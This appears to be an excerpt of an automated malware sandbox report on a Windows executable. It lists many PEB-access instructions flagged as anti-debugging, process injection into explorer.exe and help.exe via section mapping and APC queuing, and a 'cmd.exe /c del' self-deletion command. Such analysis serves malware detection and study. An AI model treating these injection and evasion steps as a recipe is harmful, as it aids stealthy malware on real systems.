                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A26620 mov eax, dword ptr fs:[00000030h]2_2_01A26620
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28620 mov eax, dword ptr fs:[00000030h]2_2_01A28620
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E627 mov eax, dword ptr fs:[00000030h]2_2_01A0E627
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E609 mov eax, dword ptr fs:[00000030h]2_2_01A6E609
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F262C mov eax, dword ptr fs:[00000030h]2_2_019F262C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32619 mov eax, dword ptr fs:[00000030h]2_2_01A32619
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A660 mov eax, dword ptr fs:[00000030h]2_2_01A2A660
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A660 mov eax, dword ptr fs:[00000030h]2_2_01A2A660
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB866E mov eax, dword ptr fs:[00000030h]2_2_01AB866E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB866E mov eax, dword ptr fs:[00000030h]2_2_01AB866E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A22674 mov eax, dword ptr fs:[00000030h]2_2_01A22674
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0C640 mov eax, dword ptr fs:[00000030h]2_2_01A0C640
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov esi, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov eax, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov eax, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F09AD mov eax, dword ptr fs:[00000030h]2_2_019F09AD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F09AD mov eax, dword ptr fs:[00000030h]2_2_019F09AD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E9E0 mov eax, dword ptr fs:[00000030h]2_2_01A7E9E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A229F9 mov eax, dword ptr fs:[00000030h]2_2_01A229F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A229F9 mov eax, dword ptr fs:[00000030h]2_2_01A229F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A869C0 mov eax, dword ptr fs:[00000030h]2_2_01A869C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A249D0 mov eax, dword ptr fs:[00000030h]2_2_01A249D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA9D3 mov eax, dword ptr fs:[00000030h]2_2_01ABA9D3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A8892B mov eax, dword ptr fs:[00000030h]2_2_01A8892B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8918 mov eax, dword ptr fs:[00000030h]2_2_019E8918
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8918 mov eax, dword ptr fs:[00000030h]2_2_019E8918
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7892A mov eax, dword ptr fs:[00000030h]2_2_01A7892A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E908 mov eax, dword ptr fs:[00000030h]2_2_01A6E908
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E908 mov eax, dword ptr fs:[00000030h]2_2_01A6E908
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C912 mov eax, dword ptr fs:[00000030h]2_2_01A7C912
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov eax, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov edx, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov eax, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94978 mov eax, dword ptr fs:[00000030h]2_2_01A94978
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94978 mov eax, dword ptr fs:[00000030h]2_2_01A94978
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C97C mov eax, dword ptr fs:[00000030h]2_2_01A7C97C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70946 mov eax, dword ptr fs:[00000030h]2_2_01A70946
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0887 mov eax, dword ptr fs:[00000030h]2_2_019F0887
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C89D mov eax, dword ptr fs:[00000030h]2_2_01A7C89D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA8E4 mov eax, dword ptr fs:[00000030h]2_2_01ABA8E4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C8F9 mov eax, dword ptr fs:[00000030h]2_2_01A2C8F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C8F9 mov eax, dword ptr fs:[00000030h]2_2_01A2C8F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E8C0 mov eax, dword ptr fs:[00000030h]2_2_01A1E8C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A830 mov eax, dword ptr fs:[00000030h]2_2_01A2A830
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9483A mov eax, dword ptr fs:[00000030h]2_2_01A9483A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9483A mov eax, dword ptr fs:[00000030h]2_2_01A9483A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov ecx, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C810 mov eax, dword ptr fs:[00000030h]2_2_01A7C810
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4859 mov eax, dword ptr fs:[00000030h]2_2_019F4859
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4859 mov eax, dword ptr fs:[00000030h]2_2_019F4859
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E872 mov eax, dword ptr fs:[00000030h]2_2_01A7E872
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E872 mov eax, dword ptr fs:[00000030h]2_2_01A7E872
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86870 mov eax, dword ptr fs:[00000030h]2_2_01A86870
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86870 mov eax, dword ptr fs:[00000030h]2_2_01A86870
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A02840 mov ecx, dword ptr fs:[00000030h]2_2_01A02840
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20854 mov eax, dword ptr fs:[00000030h]2_2_01A20854
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4BB0 mov eax, dword ptr fs:[00000030h]2_2_01AA4BB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4BB0 mov eax, dword ptr fs:[00000030h]2_2_01AA4BB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00BBE mov eax, dword ptr fs:[00000030h]2_2_01A00BBE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00BBE mov eax, dword ptr fs:[00000030h]2_2_01A00BBE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7CBF0 mov eax, dword ptr fs:[00000030h]2_2_01A7CBF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EBFC mov eax, dword ptr fs:[00000030h]2_2_01A1EBFC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EBD0 mov eax, dword ptr fs:[00000030h]2_2_01A9EBD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EB20 mov eax, dword ptr fs:[00000030h]2_2_01A1EB20
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EB20 mov eax, dword ptr fs:[00000030h]2_2_01A1EB20
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8B28 mov eax, dword ptr fs:[00000030h]2_2_01AB8B28
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8B28 mov eax, dword ptr fs:[00000030h]2_2_01AB8B28
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019ECB7E mov eax, dword ptr fs:[00000030h]2_2_019ECB7E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4B4B mov eax, dword ptr fs:[00000030h]2_2_01AA4B4B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4B4B mov eax, dword ptr fs:[00000030h]2_2_01AA4B4B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86B40 mov eax, dword ptr fs:[00000030h]2_2_01A86B40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86B40 mov eax, dword ptr fs:[00000030h]2_2_01A86B40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABAB40 mov eax, dword ptr fs:[00000030h]2_2_01ABAB40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A98B42 mov eax, dword ptr fs:[00000030h]2_2_01A98B42
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EB50 mov eax, dword ptr fs:[00000030h]2_2_01A9EB50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46AA4 mov eax, dword ptr fs:[00000030h]2_2_01A46AA4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4A80 mov eax, dword ptr fs:[00000030h]2_2_01AC4A80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28A90 mov edx, dword ptr fs:[00000030h]2_2_01A28A90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8AA0 mov eax, dword ptr fs:[00000030h]2_2_019F8AA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8AA0 mov eax, dword ptr fs:[00000030h]2_2_019F8AA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2AAEE mov eax, dword ptr fs:[00000030h]2_2_01A2AAEE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2AAEE mov eax, dword ptr fs:[00000030h]2_2_01A2AAEE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0AD0 mov eax, dword ptr fs:[00000030h]2_2_019F0AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24AD0 mov eax, dword ptr fs:[00000030h]2_2_01A24AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24AD0 mov eax, dword ptr fs:[00000030h]2_2_01A24AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA24 mov eax, dword ptr fs:[00000030h]2_2_01A2CA24
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EA2E mov eax, dword ptr fs:[00000030h]2_2_01A1EA2E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A14A35 mov eax, dword ptr fs:[00000030h]2_2_01A14A35
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A14A35 mov eax, dword ptr fs:[00000030h]2_2_01A14A35
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA38 mov eax, dword ptr fs:[00000030h]2_2_01A2CA38
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7CA11 mov eax, dword ptr fs:[00000030h]2_2_01A7CA11
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EA60 mov eax, dword ptr fs:[00000030h]2_2_01A9EA60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F6A50 mov eax, dword ptr fs:[00000030h]2_2_019F6A50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6CA72 mov eax, dword ptr fs:[00000030h]2_2_01A6CA72
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6CA72 mov eax, dword ptr fs:[00000030h]2_2_01A6CA72
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00A5B mov eax, dword ptr fs:[00000030h]2_2_01A00A5B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00A5B mov eax, dword ptr fs:[00000030h]2_2_01A00A5B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4DAD mov eax, dword ptr fs:[00000030h]2_2_01AC4DAD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A26DA0 mov eax, dword ptr fs:[00000030h]2_2_01A26DA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8DAE mov eax, dword ptr fs:[00000030h]2_2_01AB8DAE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8DAE mov eax, dword ptr fs:[00000030h]2_2_01AB8DAE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CDB1 mov ecx, dword ptr fs:[00000030h]2_2_01A2CDB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CDB1 mov eax, dword ptr fs:[00000030h]2_2_01A2CDB1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Source: C:\Windows\SysWOW64\help.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Thread register set: target process: 4084
                Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 4084
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Thread APC queued: target process: C:\Windows\explorer.exe
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: 7C0000
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Process created: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                Source: explorer.exe, 00000003.00000000.1380877734.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2738994986.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1374882310.00000000044D0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000003.00000000.1372975908.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1372654230.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3821468996.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
